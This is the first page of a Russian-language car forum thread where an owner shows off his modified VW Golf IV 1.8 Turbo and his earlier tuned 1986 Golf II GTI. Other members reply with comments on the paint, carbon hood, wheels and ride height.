Результаты опроса: Нравится ли Вам, как выглядит моя машина:

Голосовавшие
67. Вы ещё не голосовали в этом опросе
  • Да.

50 74.63%
  • Нет.

17 25.37%
+ Ответить в теме
Страница 1 из 6 1 2 3 ... ПоследняяПоследняя
Показано с 1 по 10 из 54

Тема: My Pocket_Rocket.

GTI-Racing Pocket_Rocket is on a distinguished road Аватар для Pocket_Rocket
    Машина
    Golf IV 1,8 Turbo.

Exclamation My Pocket_Rocket.

Наконец то нашел в себе силы создать тут тему...
    Итак:

После продажи своего Golf II начал задумываться над поиском достойной замены. Выбор был сложным, так как хотелось машину, чтобы комфортно ездить и кататься без поломок. Так как опыт владения мощным автомобилем располагал к определённой манере езды (жесткая подвеска, рычащий звук, низкий клиренс и громкая музыка), то при покатушках на тихих, удобных автомобилях друзей, хотелось бывало купить такой же комфортабельный автомобиль. Я пересмотрел множество объявлений о продаже различных машин BMW, AUDI, TOYOTA, VW, MITSUBISHI. Но все равно задумывался о двигателе, так как меня не посещала мысль о том, что не смогу тошнить в пробках и потоке. Так же не хотелось машину с АКПП, потому, что компьютер не предсказуем, ну или может на ручке не накатался. Настоящую машину, я видел еще раньше, чем собирался менять авто на другой, причем пришел к решению о продаже спонтанно, не хотелось отдавать машину, которой жил 2 года… При первой встрече с владельцем машины (он мне знаком), я спросил, что если ты будешь продавать ее, попридержи для меня. Так и вышло. Из всей массы я выделил именно Golf IV. Помимо мощного турбомотора он подкупил меня эксклюзивным кожаным салоном Recaro Color Concept и очень богатой комплектацией. В неё входит: АБС, антибукс, система круиз- контроля, климат- контроль, 6 подушек безопасности, подогрев сидений, стеклоподъемники, аудио система из магнитолы с чейнджером, навигацией и качественного звука из 8 ми колонок а так же электролюк. Единственное, что не нравилось состояние кузова и подвески. Было над чем поработать. Так как цена авто была адекватной, я забрал его себе… С этого момента начался бесконечный процесс по доводке к идеалу… Перебрал подвеску, сделал косметический ремонт кузова и поменял сцепление, магнитолу, не смотря на её крутизну на более лучшую, поставил карбоновый капот, за что огромное спасибо моим друзьям с GOLF IV клуба.Купил диски LM Technik на 17 дюймов и резину Bridgestone Potenza 225/45. За время эксплуатации поставил ксеноновые лампы и покрасил фары внутри в чёрный мат. Убрал все косяки с кузова, отполировал! Поставил сабвуфер и заменил магнитолу. так как хороший звук для меня очень важен. На данный момент он такой. как на фото:
    Изображения
    Последний раз редактировалось Pocket_Rocket; 06.10.2009 в 03:20.
    В прошлом: Golf II, 1986, 9a-KR, VAG-Sport,-60, 15".
    В настоящем: Golf IV, 1999, 1800 turbo, Manual, 3 door's, 17" LM Techik, Carbon In-Pro, Rieger-MS topline, K&N, Recaro Color Conceptю

Машина
    Golf IV 1,8 Turbo.
    А вот про мою бывшую машину:

История началась в Литве, там её подготавливали к кольцевым гонкам. Всё поменялось, когда отказали в регистрации из-за доработок двигателя и подвески. В Европе с этим намного строжечем у нас. Далее всё предсказуемо: тачка попала в поле зрения человека, который на тот момент занимался поставкой запчастей в Россию. Купил её себе в 2006 больше для покатушек на выходные. Очень редко тут ездил, всегда командировки. Как раз в тот момент я искал машину себе, за такие деньги можно было купить что то типа 2108, друзья уговаривали не покупать ведра! А я, до того самого момента, никогда не пёрся от Гольф 2. Решил забрать, попробовать!

Эта машина- реально машина с душой. Все, кто говорил, что пора её менять и это не больше чем старое ведро и подобное- не правы! В новой машине ни когда не будет души потому, что она новая. Потому, что таких одинаковых- миллионы. В ней нечего делать и крутить, никаких доработок, настроек под себя. Многие не согласятся со мной, но машину с 23-х летним жизненным опытом очень сложно иметь, особенно содержать её в таком состоянии. Тачки такого плана для меня- это отдельно существующие персонажи… Я понимаю владельцев таких авто на сто процентов. Это Vdub! Прошу не путать с машинами на которых просто работают или просто ездят. И также четко скажу, что характер этой машины- мой характер. Её повадки и агрессивность, манеры- во многом схожи с моими. Потому, что я два года жил этой жизнью… Когда на GTI 1986 года выпуска ты пытаешься найти детали оригинал, так как китай- не круто. Когда ты ковыряешься в ней постоянно для того, чтобы это ехало. Вам, я уверен, никогда не понять этого.Только из-за того, что у вас этого не было. Вы никогда не любовались удивленными лицами владельцев "жестяных" иномарок свежего года выпуска, обгоняя их, вы никогда не испытывали чувство скорости и ускорения 16-ти клапанного мотораобъёмом два литра, на машине весом 900 килограмм, никогда не рулили и не гоняли по грунтовым трассам на спорт подвеске -60. Это субкультура, свой мир, в котором каждый человек и машина- неотъемлемые части друг друга. Жаль, что это общество очень немногочисленно и для кого- то не понятно! Считаю это из-за того, что многие идеализируют дешевый пластик и уродливые формы выдают за совершенство. Большинство не пытались даже разобраться что к чему. А те
    , кто попробовал и смог, действительно заслужили похвалы.

Жалко, что обстоятельства вынудили продать. Хотелось чего то нового, я не скажу, что ошибся в выборе новой тачки. Но скажу точно, была бы возможность я её себе оставил…

Список доработок:
    1. Мотор: 1800 cm3, 16 v инжектор, спорт выпуск 60 мм "Atiho Racing";
    2. Ходовая: 5- кпп Golf 3 GTI(1,8), дисковые тормоза по кругу перед 14" вентилируемые, зад 13";
    3. Подвеска: занижение "FK Automotive — 60";
    4. Кузов и салон: Красный, 1986 г.в., Vag- sport от Golf4, руль Golf 3 airbag, фары и поворотники "DEPO" хрусталь, ксенон, тонированные стекла, люк в крыше, монодворник, растяжка передних стоек "Sandtler", заварена крышка багажника, открывается с кнопки, дополнительные приборы "Auto Gauge";
    5. Колеса: Диски R 15- "Racing Wheels", покрышки "Pirelli P 5000 Drago" 195/50,
    6. Аудио: ГУ "Alpine 9881", кроссоверы и передняя коаксиальная аккустика "Macrom", УМ "JBL GTO", сабвуфер "JBL".

Фото:
    Изображения
    В настоящем: Golf IV, 1999, 1800 turbo, Manual, 3 door's, 17" LM Techik, Carbon In-Pro, Rieger-MS topline, K&N, Recaro Color Conceptю

Супер Модератор BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of Аватар для BON
    Машина
    Skoda
    отличные пепелацы. По мне так на фотке носок 2-й на черных колесах очень понравился
    песок сыпется....не останавливайтесь на достигнутом !

GTI-Racing VVZ will become famous soon enough Аватар для VVZ
    Машина
    VW Golf GTI Mk5 DSG
    Хороший автомобиль! Цвер редкий и красивый.
    Черный капот спорная вещь, т.к. в моём понимании черный капот должен быть черного цвета только если он карбоновый :)

И "сетачку" надо срочно с номеров снять!
    С уважением, Василий.

My onboard video.

Модератор inVENTOr is just really nice inVENTOr is just really nice inVENTOr is just really nice inVENTOr is just really nice Аватар для inVENTOr
    Машина
    BMW 330D Соляра Power
    Цитата Сообщение от VVZ Посмотреть сообщение
    +500:stop:
    Колхоз имхо:)
    По теме 2ой гольф очень клевый:) на счет 4го носка, имхо, надо немного опустить:)
    BMW 330D POWERED by Dizelboost :pepper:

GTI-Racing Ronny is on a distinguished road Аватар для Ronny
    я бы такой гольф 2 если был такой не продал бы никада!!!!!!!!он АХ?ИТЕЛЕН!!!!!!!!!!!

GTI-Racing Zerg is on a distinguished road Аватар для Zerg
    Машина
    GTI
    Ronny
    +1
    в Г2 свап 1.8Т и Г4 курит в сторонке :)

Цитата Сообщение от Ronny Посмотреть сообщение
    я бы такой гольф 2 если был такой не продал бы никада!!!!!!!!он АХ?ИТЕЛЕН!!!!!!!!!!!
    +500, в зеленом пластика много, колеса не его, и ронять ниже

г2 на черных секс)
    The day I've bought my GTI was the day I became alive. ©
    GTI не стареют, со временем они становятся быстрее, и ниже. ©

Машина
    Golf IV 1,8 Turbo.
    Цитата Сообщение от VVZ Посмотреть сообщение
    Хороший автомобиль! Цвер редкий и красивый.
    Черный капот спорная вещь, т.к. в моём понимании черный капот должен быть черного цвета только если он карбоновый :)

Сеточку с номеров снял,давно, обратите внимание....

А капот черный как раз потому, что он карбоновый! И даже не плёнка)))

Ну то, что ронять и дураку понятно.... На таких форумах "стандарная фраза". )))К весне может и уроню... Сейчас смысла никакого!

Красного продал, так как маленько подустал от него... Да и если были бы деньги,конечно оставил себе!Просто как единственная машинаон не подходил... Потому, что делать приходилось... ну и даунпайп на 60 и подвеска с занижением давали о себе знать.

А мотор итак не плохо пёр!

Патрик, ты именно про какие колёса говоришь???? Там их три комплекта на фотках разных!

+ Ответить в теме
Страница 1 из 6 1 2 3 ... ПоследняяПоследняя

Ваши права